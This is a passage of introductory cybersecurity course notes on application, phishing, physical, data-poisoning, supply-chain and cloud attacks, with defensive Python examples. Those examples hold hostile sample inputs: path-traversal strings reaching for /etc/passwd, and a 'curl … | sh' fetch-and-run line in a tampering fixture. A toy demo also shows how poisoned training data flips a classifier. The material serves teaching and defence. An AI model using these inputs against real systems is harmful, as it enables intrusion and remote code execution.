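    """What a vulnerable handler does: join and open. normpath shows where it ends up."""
    return os.path.normpath(os.path.join(str(root), requested))

def resolve_under_root(root, requested):
    """Canonicalise first, then prove the result is still inside root.
    Leading slashes are stripped so absolute requests stay relative to root."""
    root = Path(root).resolve()
    target = (root / requested.lstrip("/\\")).resolve()   # collapses '..' and follows symlinks
    try:
        target.relative_to(root)
    except ValueError:
        raise PermissionError(f"request escapes web root: {requested!r}")
    return target

def serve(root, raw_path):
    """Decode once (as the web server would) and serve only files under root."""
    target = resolve_under_root(root, unquote(raw_path))
    return target.read_text() if target.is_file() else None

def make_demo_root():
    root = Path(tempfile.mkdtemp())          # constructed web root for the demo
    (root / "static").mkdir()
    (root / "index.html").write_text("hello")
    return root

if __name__ == "__main__":
    root = make_demo_root()
    print(naive_target(root, "../../etc/passwd"))   # outside the web root
    print(serve(root, "static/../index.html"))       # 'hello'
    try:
        serve(root, "%2e%2e/%2e%2e/etc/passwd")
    except PermissionError as err:
        print(err)
```

Checking for the literal string ".." is not a substitute for this: encoded forms, backslashes on Windows and symlinks inside the web root all get past a string filter, whereas comparing canonical paths catches them all.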

Resource exhaustion attacks

These attacks are computer security exploits that crash, hang or otherwise interfere with a
targeted program or system. Rather than overwhelming network bandwidth like a DoS
attack, resource exhaustion attacks overwhelm the hardware resources available on the
target’s server instead.

1.5.9 Defending Against Application Attacks

There are several actions that you can take to defend against an application attack. You will
find some of them outlined here.

 The first line of defense against an application attack is to write solid code.
 Prudent programming practice involves treating and validating all input from
outside of a function as if it is hostile.
 Keep all software, including operating systems and applications, up to date and do
not ignore update prompts. Remember that not all programs update automatically.
1.5.10 Avatar

Email is used by billions of people worldwide and, as a result, has become a major
vulnerability to users and organizations.

1.5.11 Spam

Spam, also known as junk mail, is simply unsolicited email. In most cases, it is a method of
advertising. However, a lot of spam is sent in bulk by computers infected by viruses or
worms — and often contains malicious links, malware or deceptive content that aims to
trick recipients into disclosing sensitive information, such as a social security number or
bank account information.

Almost all email providers filter spam, but it still consumes bandwidth. And even if you
have security features implemented, some spam might still get through to you. Look out for
the following indicators of spam:

 The email has no subject line.
 The email asks you to update your account details.
 The email text contains misspelled words or strange punctuation.
 Links within the email are long and/or cryptic.
 The email looks like correspondence from a legitimate business, but there are tiny
differences — or it contains information that does not seem relevant to you.
 The email asks you to open an attachment, often urgently.

If you receive an email that contains one or more of these indicators, you should not open
the email or any attachments. Many organizations have an email policy that requires
employees to report receipt of this type of email to their cybersecurity team for further
investigation. If in doubt, always report.

1.5.12 Phishing

Phishing is a form of fraudulent activity often used to steal personal information.

Phishing occurs when a user is contacted by email or instant message or in any other way
by someone masquerading as a legitimate person or organization. The intent is to trick the
recipient into installing malware on their device or into sharing personal information, such
as login credentials or financial information.

For example, you receive an email congratulating you for winning a prize. It looks like it
was sent from a well-known retail store and asks you to click on a link to claim your prize.
This link may in fact redirect you to a fake site that asks you to enter your personal details,
or it may even install malware on your device.

Spear phishing
A highly targeted attack, spear phishing sends customized emails to a specific person based
on information the attacker knows about them, which could be their interests, preferences,
activities and work projects.

For example, a cybercriminal discovers through their research that you are looking to buy a
specific model of car. The cybercriminal joins a car discussion forum you are a member of,
forges a car sale offering and sends you an email that contains a link to see pictures of the
car. When you click on the link, you unknowingly install malware on your device.

1.5.13 Vishing, Pharming and Whaling

Criminals make use of a wide range of techniques to try to gain access to your personal
information.

Vishing

Often referred to as voice phishing, this type of attack sees criminals use voice
communication technology to encourage users to divulge information, such as their credit
card details.

Criminals can spoof phone calls using voice over internet protocol (VoIP), or leave
recorded messages to give the impression that they are legitimate callers.

Pharming

This type of attack deliberately misdirects users to a fake version of an official website.
Tricked into believing that they are connected to a legitimate site, users enter their
credentials into the fraudulent website.

Whaling

Whaling is a phishing attack that targets high profile individuals, such as senior executives
within an organization, politicians and celebrities.

1.5.15 Defending Against Email and Browser Attacks

There are many actions that you can take to defend against email and browser attacks.
Some of the most important ones are outlined here.

It is difficult to stop spam, but there are ways to reduce its effects:

 Most Internet service providers (ISPs) filter spam before it reaches the user’s inbox.
 Many antivirus and email software programs automatically detect and remove
dangerous spam from an email inbox.
 Organizations should educate employees about the dangers of unsolicited emails
and make them aware of the dangers of opening attachments.
 Never assume that email attachments are safe, even when they come from a trusted
contact. Always scan attachments before opening them.

Become a member of the Anti-Phishing Working Group (APWG). It is an international
association of companies focused on eliminating identity theft and fraud resulting from
phishing and email spoofing.

All software should be kept up-to-date, with the latest security patches applied to protect
against any known security vulnerabilities.

1.5.16 Avatar

Phew! That’s a lot to take in. Cybercriminals can employ a range of tactics to get the
information they want. And we’re not done yet!

1.5.17 There's More...

Physical attacks

Physical attacks are intentional, offensive actions used to destroy, expose, alter, disable,
steal or gain unauthorized access to an organization’s infrastructure or hardware.

Examples of physical attacks include:

 Loading malware onto a USB flash drive that infects a device when plugged in.
 Fitting cables and plugs such as generic USB cables, mobile device charging cables
and wall or power adapters with advanced technologies, such as a wireless chip, to
allow an attacker to control or provide instructions to a device.
 Copying or skimming data from a credit or debit card using a specialized terminal to
create a cloned card, which can be used to gain unauthorized access to the victim’s
accounts.

Adversarial artificial intelligence attacks

Machine learning is a method of automation that allows devices to carry out analysis and
perform tasks without specifically being programmed to do so. It powers many of the
applications we use today, such as web searching, photo tagging, spam detection, video
surveillance, fraud detection and security automation.

Machine learning uses mathematical models to predict outcomes. However, these models
are only as good as the data they are trained on. If an attacker can taint that data (known
as data poisoning), the predictions the model makes can be steered in the attacker's favour.
For example, poisoned training data could trick an autonomous vehicle into misinterpreting
street signs.
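The street-sign example above is, in machine learning terms, a data poisoning attack. To make the mechanism concrete, here is an added toy example (not from the course) in which a nearest-centroid classifier is trained on constructed two-dimensional "image features"; the attacker injects a few mislabelled samples and the model's prediction for a stop-sign-like input flips. The example also shows that computing each class prototype with a median instead of a mean makes a minority of poisoned points ineffective. Feature values, labels and the classifier are all assumptions made for the demo; real vision models and real poisoning attacks are far more complex.

```python
import math
from statistics import mean, median

# Constructed training data: two made-up "image features" per sample and the
# sign class a vision model should assign. Values are chosen so the demo is
# easy to follow by hand, not taken from any real dataset.
CLEAN_TRAINING = [
    ((1, 1), "stop"), ((1, 2), "stop"), ((2, 1), "stop"), ((2, 2), "stop"),
    ((5, 5), "speed limit"), ((5, 6), "speed limit"),
    ((6, 5), "speed limit"), ((6, 6), "speed limit"),
]

# The attacker controls part of the data pipeline and injects samples that
# look like stop signs but carry the wrong label (label-flipping poisoning).
POISON = [((3, 3), "speed limit"), ((2, 3), "speed limit"), ((3, 2), "speed limit")]

# A stop-sign-like input the deployed model is later asked to classify.
TEST_SAMPLE = (3, 3)


def train(samples, robust=False):
    """Nearest-centroid classifier: one prototype point per class.

    With robust=True the prototype is the coordinate-wise median, which a
    minority of poisoned points cannot drag far; the mean moves with them."""
    by_label = {}
    for features, label in samples:
        by_label.setdefault(label, []).append(features)
    aggregate = median if robust else mean
    return {label: tuple(aggregate(column) for column in zip(*points))
            for label, points in by_label.items()}


def predict(model, features):
    """Assign the class whose prototype is closest in feature space."""
    return min(model, key=lambda label: math.dist(model[label], features))


def demo():
    """Return (clean, poisoned, hardened) predictions for TEST_SAMPLE."""
    clean = predict(train(CLEAN_TRAINING), TEST_SAMPLE)
    poisoned = predict(train(CLEAN_TRAINING + POISON), TEST_SAMPLE)
    hardened = predict(train(CLEAN_TRAINING + POISON, robust=True), TEST_SAMPLE)
    return clean, poisoned, hardened


if __name__ == "__main__":
    clean, poisoned, hardened = demo()
    print("clean model:   ", clean)
    print("poisoned mean: ", poisoned)
    print("poisoned median:", hardened)
```

Three poisoned points out of seven move the mean prototype of the "speed limit" class from (5.5, 5.5) to about (4.3, 4.3), close enough to (3, 3) to steal the prediction; the median prototype stays at (5, 5). Robust aggregation is only one layer: provenance controls on the training data and validation against a trusted hold-out set catch poisoning that is more carefully shaped than this.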

Supply chain attacks

Many organizations interface with a third party for their systems management or to
purchase components and software. Organizations may even rely on parts or components
from a foreign source.

Attackers often find ways to interfere with these supply chains, tampering with a component
or software package before it reaches the customer, or exploiting the contractual side of a
supplier relationship. For example, software support is usually tied to a specific support
agreement and an end-of-life (EOL) date; a change to that date could mean that an
organization is no longer eligible for service and maintenance support for a component it
still depends on.
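The consumer-side check that catches tampering with a shipped artifact is to compare what arrived with a digest manifest the publisher issued, in the style of a SHA256SUMS file. The following is an added example for this page (not from the course): the publisher builds the manifest over constructed release files, the consumer verifies a download in which one file was altered, one is missing and one was never listed, and installation is refused unless everything matches. File names and contents are made up for the demo.

```python
import hashlib
import hmac

# Constructed artifacts for this example. The publisher computes a digest
# manifest over the files it ships; the consumer recomputes the digests over
# what actually arrived. Contents are made up.
PUBLISHED = {
    "libwidget-1.4.2.tar.gz": b"widget library release 1.4.2",
    "widget-cli-1.4.2.tar.gz": b"widget cli release 1.4.2",
    "firmware-2.0.bin": b"\x7fELF\x01\x01\x01\x00firmware 2.0",
}

# What the consumer downloaded: one artifact altered in transit, one missing,
# one extra file that the publisher never listed.
DOWNLOADED = {
    "libwidget-1.4.2.tar.gz": b"widget library release 1.4.2 + backdoor",
    "firmware-2.0.bin": b"\x7fELF\x01\x01\x01\x00firmware 2.0",
    "widget-helper.sh": b"curl http://198.51.100.7/x | sh",
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(files):
    """Publisher side: SHA256SUMS-style text, one '<hex>  <name>' per line."""
    return "".join(f"{sha256_hex(content)}  {name}\n"
                   for name, content in sorted(files.items()))


def parse_manifest(text):
    """Map file name -> expected lowercase hex digest."""
    expected = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, name = line.split(None, 1)
        expected[name.strip()] = digest.lower()
    return expected


def verify(manifest_text, downloaded):
    """Consumer side: classify every artifact as ok / mismatch / missing / unlisted."""
    expected = parse_manifest(manifest_text)
    status = {}
    for name, digest in expected.items():
        if name not in downloaded:
            status[name] = "missing"
        elif hmac.compare_digest(sha256_hex(downloaded[name]), digest):
            status[name] = "ok"
        else:
            status[name] = "mismatch"
    for name in downloaded:
        if name not in expected:
            status[name] = "unlisted"
    return status


def safe_to_install(status):
    """Refuse the whole batch unless every artifact is listed, present and intact."""
    return all(state == "ok" for state in status.values())


if __name__ == "__main__":
    manifest = build_manifest(PUBLISHED)
    result = verify(manifest, DOWNLOADED)
    for name, state in sorted(result.items()):
        print(f"{state:9} {name}")
    print("install:", "proceed" if safe_to_install(result) else "refuse")
```

A digest manifest only helps if it travels over a channel the attacker cannot also tamper with, so in practice the manifest is signed (for example with GPG, minisign or Sigstore) and the signature is verified before the digests are trusted; an attacker who can replace an archive on a mirror can usually replace an unsigned SHA256SUMS next to it.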

Cloud-based attacks

Rather than developing systems on their own premises, more and more organizations are
making the move toward cloud-based computing, as we discussed earlier in this module.

The advantage is that the cloud provider maintains the equipment, but the move also exposes
an organization to a host of potential threats. Attackers constantly look for ways to get at
sensitive data stored in the cloud, and at the cloud-hosted applications, platforms and
infrastructure offered as SaaS, PaaS and IaaS, as we saw earlier.

1.6 Cybersecurity Threats, Vulnerabilities, and Attacks Summary

1.6.1 What Did I Learn in this Module?

Threat Domains

A threat domain is an area of control, authority, or protection that attackers can exploit to
gain access to a system. Cyber threat categories include software attacks and errors,
sabotage, human error, theft, hardware failures, utility interruption, and natural disasters.
Internal threats are usually carried out by current or former employees and other contract
partners. The source of an external threat typically stems from amateur or skilled attackers
who can exploit vulnerabilities in networked devices, or use social engineering techniques.
A user domain includes anyone with access to an organization’s information system.
Common user threats include poorly enforced security policies, data theft, unauthorized
downloads and media, unauthorized VPNs and websites, and destruction of systems,
applications, or data. Individual devices, LANs and private and public clouds are also
vulnerable to attack. There are complex threats such as an APT and an algorithm attack.
Cybercriminals use backdoor programs to gain unauthorized access to a system by
bypassing the normal authentication procedures. Backdoors grant cybercriminals continued
access to a system, even if the organization has fixed the original vulnerability used to
attack the system. Most rootkits exploit software vulnerabilities to gain access to resources
and modify system files. Rootkits can also modify system forensics and monitoring tools,
making them very hard to detect.
The dark web is encrypted web content that is not indexed by conventional search engines
and requires specific software, authorization, or configurations to access. IOCs such as
malware signatures or domain names provide evidence of security breaches. AIS enables
the real-time exchange of cybersecurity threat indicators using standardized and structured
languages called STIX and TAXII.

Deception

Social engineering is a non-technical strategy that attempts to manipulate individuals into
performing certain actions or divulging confidential information. Pretexting is when an
individual lies to gain access to privileged data. Quid pro quo attacks are a request for
personal information in exchange for something. Identity fraud is using a person’s stolen
identity to obtain goods or services by deception.

Social engineering tactics include impersonating an authority figure, intimidation,
consensus (“everyone is doing it”), pretending something is scarce or that a situation is
urgent, building familiarity and trust with an employee to eventually leverage that into
access. Shoulder surfing is looking over a target’s shoulder to gain valuable information
such as PINs, access codes or credit card details. Criminals do not always have to be near
their victim to shoulder surf, they can use binoculars or security cameras to obtain this
information. Dumpster diving is going through a target's trash to see what information has
been thrown out. Piggybacking or tailgating is when a criminal follows an authorized
person to gain physical entry into a secure location or a restricted area. Other methods of
deception include invoice scams, watering hole attacks, typosquatting, prepending, and
influence campaigns.

Organizations need to promote awareness of social engineering tactics and properly educate
employees on prevention measures.

Cyber Attacks

Malware is any code that can be used to steal data, bypass access controls, cause harm to or
compromise a system. A virus is a type of computer program that, when executed,
replicates, and attaches itself to other files by inserting its own code into it. A worm is a
malicious software program that replicates by independently exploiting vulnerabilities in
networks. A Trojan horse is malware that carries out malicious operations by masking its
true intent. A logic bomb is a malicious program that waits for a trigger to set off the
malicious code. Ransomware is designed to hold a computer system or the data it contains
captive until a payment is made. DoS attacks work by creating an overwhelming quantity
of traffic or by sending maliciously formatted packets that cannot be identified by an
application, causing the receiving device to run slowly or crash. DDoS attacks are similar
but originate from multiple coordinated sources. DNS attacks include spoofing and
hijacking.

Layer 2 attacks include MAC address spoofing, ARP spoofing and MAC flooding; closely
related network attacks are IP spoofing, man-in-the-middle and man-in-the-mobile. Zero-day
attacks exploit software vulnerabilities before the vendor knows about them or has released
a patch. Keyboard logging (keylogging) records keystrokes, and the keylogger software is
configured to send the log file to the criminal. This log file can reveal usernames,
passwords, websites visited, etc.

To defend against these attacks use firewalls, stay current on upgrades and patches,
distribute the workload across server systems, and block external ICMP packets with
firewalls.

Wireless and Mobile Device Attacks

Grayware is an unwanted application that behaves in an annoying or undesirable manner.
SMiShing uses fake text messages that prompt you to visit a malicious website or call a
fraudulent phone number, which may result in malware being downloaded onto your
device. A rogue access point is a wireless access point installed on a secure network
without authorization. An evil twin attack is where the attacker’s access point is set up to
look like a better connection option. Radio frequency jamming is deliberately jamming the
transmission of a radio or satellite station to prevent a wireless signal from reaching the
receiving station.

Bluejacking sends unauthorized messages or shocking images to another Bluetooth device.
Bluesnarfing is when an attacker copies information from a target’s device using Bluetooth.
WEP and WPA are security protocols that were designed to secure wireless networks.
WPA2 is an improved security protocol. Unlike WEP, WPA2’s encryption key cannot be
recovered simply by observing network traffic; note, however, that an attacker who captures
the WPA2 four-way handshake can still guess a weak pre-shared key offline, so passphrase
strength matters.

To defend against wireless and mobile device attacks: change default configurations.
Restrict access point placement by placing these devices outside the firewall or in a DMZ.
Use WLAN tools to detect rogue access points or unauthorized workstations. Have a policy
for guest access to a Wi-Fi network. Employees should use a remote access VPN for
WLAN access.

Application and Other Attacks

XSS (cross-site scripting) is a vulnerability found in many web applications that lets an
attacker run script in another user’s browser. Types of code injection attacks include XML,
SQL, DLL, and LDAP injection. A buffer overflow occurs when data is written beyond the
limits of a buffer. Remote code execution is exploiting application vulnerabilities to execute
arbitrary commands with the privileges of the account the application runs under. Other
application attacks include CSRF, race condition, improper input handling, error handling,
API, replay, directory traversal, and resource exhaustion.

Write solid code to defend against an application attack. Treat and validate all input from
outside of a function as if it is hostile. Keep all software up to date. Spam is unsolicited
email that is usually a method of advertising. Some spam is sent in bulk by computers
infected with viruses or worms. Phishing is when a user is contacted using email or instant
message by a threat actor masquerading as a legitimate person. Spear phishing sends
customized emails to a specific person based on information the attacker knows about
them. Other common scams include vishing, pharming, and whaling. Other types of attacks
include physical attacks to equipment, adversarial AI attacks, supply chain attacks and
cloud-based attacks.

Use antivirus software to defend against email and browser attacks. Never assume that
email attachments are safe. Always scan attachments before opening them. Become a
member of the Anti-Phishing Working Group (APWG). All software should be kept up-to-
date.
